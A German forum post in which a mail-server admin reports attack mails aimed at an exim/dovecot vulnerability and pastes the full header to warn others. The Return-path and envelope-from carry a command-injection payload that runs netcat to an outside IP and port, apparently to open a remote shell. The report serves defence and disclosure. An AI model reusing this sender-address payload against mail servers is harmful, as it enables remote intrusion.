Ich betreibe hier einen Server, der u.a. als Mailserver (IMAP) dient.
Dabei nutze auch ich eine Kombination von exim als SMTP-Dienst und dovecot als LDA und IMAP-Dienst.
Es geht um diese Lücke. Ich habe inzwischen mehrere Mails vom selben Angreifer an meinen postmaster-Account bekommen.
Ich weiß nicht wie der Angreifer auf meine Domain gekommen ist. Im Moment vermute ich, dass er generisch vorgeht und deshalb auch andere netcup-Kunden betroffen sein könnten. In meinem Fall versuchte der Angreifer eine netcat-Session aufzubauen.
Edit: Ich habe 2 Mails bekommen und mein Server hat 2 IPs. Das passt zur Theorie.
Edit2: Weil es mir gerade auffiel: Meine IPs liegen noch in einem Hetzner IP-Range von Netcup.
Ich packe mal den Header hier rein. Wer solche Mails bekommt, sollte das umgehend prüfen. Und natürlich sollte jeder, der exim und dovecot einsetzt prüfen, ob er von der Lücke betroffen ist. Ich bin es zum Glück nicht.
Return-path: <red`nc${IFS}178.218.211.118${IFS}9000`team@example.com>
Envelope-to: postmaster@meinedomain.de
Delivery-date: Sat, 04 May 2013 19:05:39 +0200
Received: from [178.218.211.118] (helo=abcde.com)
by meinserver.yourvserver.net with esmtp (Exim 4.72)
(envelope-from <red`nc${IFS}178.218.211.118${IFS}9000`team@example.com>)
id 1UYftu-0003rU-9j
for postmaster@meinedomain.de; Sat, 04 May 2013 19:05:39 +0200
X-Exim-Version: 4.72 (build at 25-Oct-2012 18:09:12)
X-Date: 2013-05-04 19:05:39
X-Connected-IP: 178.218.211.118:53885
X-Message-Linecount: 1
X-Body-Linecount: 0
X-Message-Size: 14
X-Body-Size: 0
X-Spam-Threshold: 5
X-Spam-Score: 4.5
X-Spam-Score-Int: 45
X-Spam-Bar: ++++
X-Spam-Report: Spam detection software, running on the system "meinserver.yourvserver.net", has
identified this incoming email as possible spam. The original message
has been attached to this so you can view it (if it isn't spam) or label
similar future email. If you have any questions, see
@@CONTACT_ADDRESS@@ for details.
Content preview: [...]
Content analysis details: (4.5 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
0.0 SPF_FAIL SPF: sender does not match SPF record (fail)
[SPF failed: Please see http://www.openspf.org/Why?s=mfrom;id=red%60nc%24%7Bifs%7D178.218.211.118%24%7Bifs%7D9000%60team%40example.com;ip=178.218.211.118;r=meinserver.yourvserver.net]
1.0 MISSING_HEADERS Missing To: header
0.8 BAYES_50 BODY: Bayes spam probability is 40 to 60%
[score: 0.4947]
0.5 MISSING_MID Missing Message-Id: header
0.8 RDNS_NONE Delivered to internal network by a host with no rDNS
1.4 MISSING_DATE Missing Date: header
X-Spam-Flag: NO
Subject: test
X-Delivered-To: postmaster@meinedomain.de (user@meinedomain.de)
X-Message-Age: 5
Alles anzeigen